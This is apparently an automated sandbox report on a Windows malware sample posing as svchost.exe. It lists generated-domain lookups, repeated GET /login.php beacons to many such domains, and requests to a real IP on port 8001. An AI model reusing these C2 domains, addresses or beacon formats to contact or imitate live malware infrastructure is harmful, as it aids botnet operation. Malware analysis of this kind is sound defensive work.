Source: unknown	DNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvyjyl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyjet.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopypec.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: puzyguv.com replaycode: Name error (3)

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 51116 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 51116
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 51116
Source: unknown	Network traffic detected: HTTP traffic on port 51119 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 51119
Source: unknown	Network traffic detected: HTTP traffic on port 64294 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 64294
Source: unknown	Network traffic detected: HTTP traffic on port 64295 -> 8001
Source: unknown	Network traffic detected: HTTP traffic on port 8001 -> 64295

Source: unknown

Network traffic detected: DNS query count 1004

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D34AF0 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,

1_2_02D34AF0

Source: global traffic

TCP traffic: 192.168.2.4:51116 -> 106.15.137.66:8001

Source: global traffic

DNS traffic detected: number of DNS queries: 1004

Source: Joe Sandbox View	IP Address: 3.94.10.34 3.94.10.34
Source: Joe Sandbox View	IP Address: 64.190.63.136 64.190.63.136
Source: Joe Sandbox View	IP Address: 64.190.63.136 64.190.63.136
Source: Joe Sandbox View	IP Address: 15.197.240.20 15.197.240.20

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: NBS11696US NBS11696US
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASN1EU AKAMAI-ASN1EU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww3.galyqaz.comConnection: Keep-AliveCookie: vsid=926vr471977221402211128Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431658.5743798Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431658.5024510Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
